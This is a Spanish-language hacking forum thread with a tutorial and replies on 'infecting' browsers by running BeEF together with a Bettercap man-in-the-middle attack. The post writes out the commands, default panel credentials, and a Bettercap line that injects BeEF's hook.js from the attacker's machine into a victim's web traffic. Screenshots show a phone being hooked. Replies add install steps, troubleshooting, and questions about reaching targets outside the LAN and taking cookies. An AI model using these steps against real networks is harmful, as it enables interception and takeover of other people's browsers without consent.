Hola a todos, en esta entrada vamos a aprender como infectar navegadores con codigo javascript :)
Primero un poco de teoria.
¿Que es BeEF?Basicamente BeEF es un framework diseñado para la explotacion de navegadores atravez de codigo javascript , dicho framework tiene una grandisima cantidad de opciones de post-explotacion que vamos a ver en profundidad en las siguientes entradas .
¿Que es Bettercap ?Bettercap es un framework para ataques MITM (man in the middle) completo y modular que surgió con el objetivo de brindarnos una herramienta mas completa y estable que ettercap.
Ahora pasemos a la parte divertida ;)
Primero vamos a abrir un terminal y vamos a correr beef con el siguiente comando:
beef-xss
(http://i.imgur.com/Qxi4Nqf.png)
Luego de lanzar este comando automaticamente se nos tendria que abrir una ventana del navegador asi:
(http://i.imgur.com/oH9LKwR.png)
En el caso de que el navegador no se abra lo abrimos nosotros y colocamos la siguiente direccion: http://127.0.0.1:3000/ui/panel (http://127.0.0.1:3000/ui/panel)
El usuario y contraseña por efecto son:
user: beef
pass: beef
(http://i.imgur.com/dqXFIDe.png)
Ok, por ahora dejariamos beef asi, pasemos a Bettercap:
Abrimos otra terminal en la que lanzaremos bettercap indicandole nuestro target (objetivo) , el modulo que vamos a utilizar y la ruta del javascript malicioso proporcionado por beef con el siguiente comando:
bettercap -T 192.168.0.101 --proxy-module injectjs --js-url "http://192.168.0.104:3000/hook.js"
(http://i.imgur.com/8uE9e9h.png)
Luego tendriamos que ver lo siguiente:
(http://i.imgur.com/5s7d4nu.png)
ahora vamos a ver como bettercap inyecta el codigo javascript que le indicamos en las peticiones de nuestra victima 8)
(http://i.imgur.com/N0LpJSP.png)
Muy bien como vemos nuestra victima ingreso a la pagina m.taringa.net desde su android , (
en este caso la maquina victima es un smartphone pero el ataque es igualmente eficaz en cualquier tipo de dispositivo o so ) y la herramienta automaticamente inyecto el codigo javascript .
Bien ahora veamos que pasa por el lado de nuestro querido beef:
(http://i.imgur.com/QqrkAFz.png)
Perfecto!!! veamos la informacion de el navegador victima.
(http://i.imgur.com/3YBRHco.png)
Muy bien asta aca llego este post , esten atentos a nuevas entradas ya que aprenderemos a obtener una sesion de meterpreter mediante esta gran herramienta .
:) :)
esperando mas ;D ;D ;D
gracias
muy interesante man, lo que no veo en la imagen es el javascript malicioso que dices que inyecta!! igual voy a probarlo, muchas gracias por tu aporte!
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
muy interesante man, lo que no veo en la imagen es el javascript malicioso que dices que inyecta!! igual voy a probarlo, muchas gracias por tu aporte!
Gracias por el comentario ceroMee !!! , fijate en la parte baja de la imajen donde dice [INJECTJS] eso seria parte de el proceso , no pude colocar todo el proceso ya que serian muchas imagenes jaja
Suena interesante, pero no entendí la parte de inyectar a la victima, se le atacara mediante dirección mac o como?
buen aporte :DD
@Maaiion (https://underc0de.org/foro/index.php?action=profile;u=62577) por el navegador
Citar¿Que es BeEF?
Basicamente BeEF es un framework diseñado para la explotacion de navegadores atravez de codigo javascript , dicho framework tiene una grandisima cantidad de opciones de post-explotacion que vamos a ver en profundidad en las siguientes entradas .
Man una pregunta, seguiste algun tutorial en especifico para instalr bettercap y beef?
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Man una pregunta, seguiste algun tutorial en especifico para instalr bettercap y beef?
Hola ceromee si , en internet hay varios , primeramente tenes que instalar ruby on rails = sudo apt-get install build-essential ruby-dev libpcap-dev
segundo para instalar bettercap solamente tienes que ejecutar el comando = gem install bettercap ,obiamente despues de tener ruby
y por ulltimo para instalar beef te recomiendo seguir la guia de instalacion en su pagina de github https://github.com/beefproject/beef/wiki/Installation
Saludos chicos , alguien me puede ayudar?
no me funciona pongo a correr bettercap realizo una busqueda en mi dispositivo y no se hookea, que puede ser ?
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Saludos chicos , alguien me puede ayudar?
no me funciona pongo a correr bettercap realizo una busqueda en mi dispositivo y no se hookea, que puede ser ?
me pasa igual.. dice que inyecta pero nada, probe con injecthtml pero lo mismo
edit: le instale chrome a la maquina virtual y agarro
Hola de nuevo, creo que para algunos de nosotros seria importante conocer la estructura de los comandos o parte de ella, ya que si bien usamos otros framework o tools mediante la terminal podemos confundirnos al momento de empezar a usar este grandioso Framework, o es una simple opinion en el este caso al tratar de comprender la ultima parte de lo siguiente:
Citarbettercap -T 192.168.0.101 --proxy-module injectjs --js-url "http://192.168.0.104:3000/hook.js"
Quisiera imaginar que aquí especificas el Target
Citar-T 192.168.0.101
Aqui especificas el modulo a usar
Citar--proxy-module injectjs
Aqui pensaria que le pasas opciones del modulo especifico
Citar--js-url
Y por ultimo la IP del atacante (Tu IP) donde se aloja el JavaScript
Citar"http://192.168.0.104:3000/hook.js"
Por favor si estoy mal díganmelo para poder entender un poco mas este framework aun no lo comienzo a usar pero me resulto de muy buena pinta este tutorial que creo pudiésemos ocupar para combinarlo con otros vectores.
Aunque el post sea viejo merece un aplauso.
Muchas gracias!!!
Enviado desde mi GT-I9505 mediante Tapatalk
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Hola de nuevo, creo que para algunos de nosotros seria importante conocer la estructura de los comandos o parte de ella, ya que si bien usamos otros framework o tools mediante la terminal podemos confundirnos al momento de empezar a usar este grandioso Framework, o es una simple opinion en el este caso al tratar de comprender la ultima parte de lo siguiente:
Citarbettercap -T 192.168.0.101 --proxy-module injectjs --js-url "http://192.168.0.104:3000/hook.js"
Quisiera imaginar que aquí especificas el Target Citar-T 192.168.0.101
Aqui especificas el modulo a usar Citar--proxy-module injectjs
Aqui pensaria que le pasas opciones del modulo especifico Citar--js-url
Y por ultimo la IP del atacante (Tu IP) donde se aloja el JavaScript Citar"http://192.168.0.104:3000/hook.js"
Por favor si estoy mal díganmelo para poder entender un poco mas este framework aun no lo comienzo a usar pero me resulto de muy buena pinta este tutorial que creo pudiésemos ocupar para combinarlo con otros vectores.
Exactamente todo lo que dijiste, es correcto.
Ademas de infectar de forma rapida atravez de spoof, hay forma de hacerlo con un portal cautivo ?
O habria que editar el index.html de /www/var para modificar la pagina del "hook.js" ?
Una pregunta solo se puede hacer en linux? y otra es puedo hacerla con una ip externa? ajena a mi Router?
Hola @benjap1 (https://underc0de.org/foro/index.php?action=profile;u=71371)
Si solo se puede en linux. y y se hacer con una IP externa "fuera de la red LAN"
Saludos..
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Una pregunta solo se puede hacer en linux? y otra es puedo hacerla con una ip externa? ajena a mi Router?
Podes intentarlo con un emulador como GNS3 o EVE, configurando los nats en cada router y ganar esa experiencia de hacerlo en "wan"....
BTW
Por otro lado, buen post, hubiera sido fantástico que hubieras puesto la imagen del navegador de la victima. Pero igual buen post. Otra cosa que me pareció interesante y no se si se puede hacer con beff (yo nunca lo he usado) pero es curioso que la mayoría de las personas dejan las cookies activas en los navegadores por defecto, entonces si beff poseé un modulo para cookies sería algo más profundo e interesante...
Buen post muchacho
quede con ganas de algo mas....
esta muy bueno el post me gustaria ver pruebas de pentest reales ojala en en alguna ctf para ir tomando experiencia.
me motive aunque quede con el gustito de algo mas..
Muchas gracias por el post y toda la informacion me as ayudado bastante :)
Gracias por el post, hay algo másnuevo aparte de beef?, yo lo utilicé usando Armitage, que es genial. Pero sinceramente me cuesta acceder desde afuera de la lan, hacía una red wan aparte. Se puede usar bien beef por fuera de la red lan?. Digamo sin haber entrado directamente por otra forma a la red;tendríamos que usar algo para entrar aparte?.